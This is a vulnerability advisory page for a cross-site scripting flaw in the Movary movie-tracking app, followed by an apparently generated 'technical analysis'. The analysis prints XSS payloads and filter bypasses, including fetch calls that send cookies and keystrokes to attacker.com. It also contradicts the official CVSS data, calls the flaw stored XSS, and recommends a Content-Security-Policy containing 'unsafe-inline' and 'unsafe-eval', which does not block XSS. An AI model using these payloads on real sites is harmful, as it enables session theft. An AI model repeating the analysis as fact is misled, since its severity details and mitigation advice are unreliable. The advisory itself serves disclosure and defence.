CVE-2026-23839
CVE-2026-23839
9.3
CriticalPublished:
Last updated:
Source:security-advisories@github.com
Analyzed
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- Required
- Scope
- Changed
- Confidentiality
- High
- Integrity
- High
- Availability
- None
Description
Movary is a web application to track, rate and explore your movie watch history. Due to insufficient input validation, attackers can trigger cross-site scripting payloads in versions prior to 0.70.0. The vulnerable parameter is `?categoryUpdated=`. Version 0.70.0 fixes the issue.
Comprehensive Technical Analysis of CVE-2026-23839 (Movary XSS Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2026-23839 CVSS Score: 9.3 (Critical) Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C Severity: Critical (High impact on confidentiality, integrity, and availability)
Vulnerability Classification
This vulnerability is a Stored Cross-Site Scripting (XSS) flaw in Movary, a self-hosted web application for tracking movie watch history. The issue stems from insufficient input validation in the ?categoryUpdated= URL parameter, allowing attackers to inject malicious JavaScript payloads that execute in the context of a victim’s browser.
CVSS Breakdown
- Attack Vector (AV:N): Exploitable remotely over a network.
- Attack Complexity (AC:M): Requires some user interaction (e.g., clicking a crafted link).
- Privileges Required (Au:N): No authentication required.
- User Interaction (UI:R): Victim must interact with a malicious link or visit a compromised page.
- Scope (S:U): Impact is confined to the vulnerable application.
- Impact Metrics (C:C/I:C/A:C): Full compromise of confidentiality, integrity, and availability.
Why Critical Severity?
- Stored XSS is particularly dangerous because malicious scripts persist in the application, affecting multiple users.
- No authentication required increases the attack surface.
- High impact on confidentiality (session hijacking, data theft) and integrity (defacement, unauthorized actions).
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
-
Payload Injection:
- An attacker crafts a malicious URL containing an XSS payload in the
?categoryUpdated=parameter. - Example:
http://vulnerable-movary-instance.com/settings?categoryUpdated=<script>malicious_code()</script> - If the application does not properly sanitize this input, the payload is stored and executed when other users access the affected page.
- An attacker crafts a malicious URL containing an XSS payload in the
-
Stored XSS Execution:
- The injected script persists in the application (e.g., in a user’s settings or profile).
- When another user loads the page, the script executes in their browser with their session privileges.
-
Possible Attack Scenarios:
- Session Hijacking: Stealing cookies (
document.cookie) to impersonate users. - Keylogging: Capturing keystrokes via JavaScript.
- Defacement: Modifying the DOM to display malicious content.
- Phishing: Redirecting users to fake login pages.
- CSRF Attacks: Forcing authenticated users to perform unintended actions.
- Session Hijacking: Stealing cookies (
Proof-of-Concept (PoC) Example
// Malicious payload to steal session cookies
fetch('https://attacker.com/steal?cookie=' + document.cookie);
- If injected via
?categoryUpdated=, this script sends the victim’s session cookie to an attacker-controlled server.
3. Affected Systems and Software Versions
- Vulnerable Software: Movary (self-hosted movie tracking web application)
- Affected Versions: All versions prior to 0.70.0
- Fixed Version: 0.70.0 (released with input sanitization patches)
- Deployment Context:
- Self-hosted instances (common in home labs, media servers).
- May be exposed to the internet if misconfigured.
4. Recommended Mitigation Strategies
Immediate Actions
-
Upgrade to Movary 0.70.0 or Later
- The fix includes proper input sanitization for the
categoryUpdatedparameter. - Patch URL: GitHub Release 0.70.0
- The fix includes proper input sanitization for the
-
Temporary Workarounds (if patching is delayed)
- Input Validation: Implement server-side validation for all URL parameters.
- Content Security Policy (CSP):
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://trusted.cdn.com;- Mitigates XSS by restricting script execution sources.
- HTTP-only & Secure Cookies: Prevents JavaScript access to session cookies.
- Web Application Firewall (WAF) Rules:
- Block requests containing
<script>,onerror=,javascript:, etc.
- Block requests containing
-
Monitoring & Detection
- Log Analysis: Monitor for suspicious
categoryUpdatedparameter values. - Behavioral Detection: Use tools like ModSecurity or OWASP Core Rule Set (CRS) to detect XSS attempts.
- Log Analysis: Monitor for suspicious
Long-Term Security Recommendations
- Secure Coding Practices:
- Use context-aware output encoding (e.g., OWASP ESAPI).
- Implement strict Content-Type headers (e.g.,
X-Content-Type-Options: nosniff).
- Regular Security Audits:
- Conduct static (SAST) and dynamic (DAST) application security testing.
- Use dependency scanning (e.g., GitHub Dependabot, Snyk) to detect vulnerable libraries.
- User Education:
- Train users to recognize phishing links and suspicious URLs.
5. Impact on the Cybersecurity Landscape
Broader Implications
- Self-Hosted Application Risks:
- Movary is a niche but growing self-hosted application, often deployed in home labs, media servers, or small businesses.
- Many self-hosted apps lack robust security, making them low-hanging fruit for attackers.
- XSS as a Persistent Threat:
- Despite being a well-known vulnerability, XSS remains a top OWASP risk due to poor input validation.
- Stored XSS is particularly dangerous because it can affect multiple users without direct interaction.
- Supply Chain & Third-Party Risks:
- If Movary is integrated with other services (e.g., Plex, Jellyfin), an XSS vulnerability could escalate into a broader compromise.
Real-World Attack Scenarios
- Targeted Attacks on Media Enthusiasts:
- Attackers could exploit this flaw to steal credentials, hijack sessions, or spread malware among movie-tracking communities.
- Botnet Propagation:
- If Movary instances are exposed to the internet, automated XSS worms could propagate, turning them into zombie nodes for DDoS or cryptomining.
- Data Exfiltration:
- Attackers could harvest sensitive user data (watch history, ratings, personal notes).
6. Technical Details for Security Professionals
Root Cause Analysis
-
Vulnerable Code Location:
- public/js/settings-account-location.js#L237
- The
categoryUpdatedparameter is directly inserted into the DOM without sanitization, allowing script execution.
-
Exploitation Flow:
- Attacker submits a crafted URL with an XSS payload in
?categoryUpdated=. - The application stores the payload (e.g., in a user’s profile or settings).
- When another user loads the affected page, the script executes in their browser.
- Attacker submits a crafted URL with an XSS payload in
Exploit Development Considerations
- Bypassing Basic Filters:
- If the application uses naive blacklisting (e.g., blocking
<script>), attackers may use:<img src=x onerror=malicious_code()> <svg/onload=malicious_code()>
- If the application uses naive blacklisting (e.g., blocking
- Session Hijacking Example:
fetch('https://attacker.com/exfil', { method: 'POST', body: JSON.stringify({ cookie: document.cookie }), headers: { 'Content-Type': 'application/json' } }); - Keylogger Example:
document.onkeypress = function(e) { fetch('https://attacker.com/log?key=' + e.key); };
Forensic & Incident Response Guidance
- Detection:
- Log Analysis: Look for unusual
categoryUpdatedvalues in HTTP logs. - Browser Forensics: Check for unexpected script execution in browser developer tools.
- Log Analysis: Look for unusual
- Containment:
- Isolate affected instances from the network.
- Revoke compromised sessions and force password resets.
- Eradication:
- Patch immediately to version 0.70.0.
- Audit all user-generated content for stored XSS payloads.
- Recovery:
- Restore from a clean backup if data tampering is suspected.
- Implement CSP and WAF rules to prevent future XSS.
Advanced Mitigation Techniques
- Subresource Integrity (SRI):
- Ensure external scripts are loaded with integrity hashes.
- Trusted Types (for Modern Browsers):
- Enforce Trusted Types to prevent DOM-based XSS.
- Automated Security Testing:
- Integrate OWASP ZAP or Burp Suite into CI/CD pipelines for XSS detection.
Conclusion
CVE-2026-23839 is a critical stored XSS vulnerability in Movary that poses significant risks to confidentiality, integrity, and availability. Given its low attack complexity and high impact, organizations and individuals running affected versions must patch immediately and implement defensive measures such as CSP, WAF rules, and input validation.
Security professionals should monitor for exploitation attempts, educate users on phishing risks, and conduct regular security audits to prevent similar vulnerabilities in self-hosted applications. The broader cybersecurity community must remain vigilant against persistent XSS threats, particularly in niche but widely used web applications.
References
security-advisories@github.com
https://github.com/leepeuker/movary/blob/main/public/js/settings-account-location.js#L237security-advisories@github.com
https://github.com/leepeuker/movary/releases/tag/0.70.0security-advisories@github.com
https://github.com/leepeuker/movary/security/advisories/GHSA-v32w-5qx7-p3vq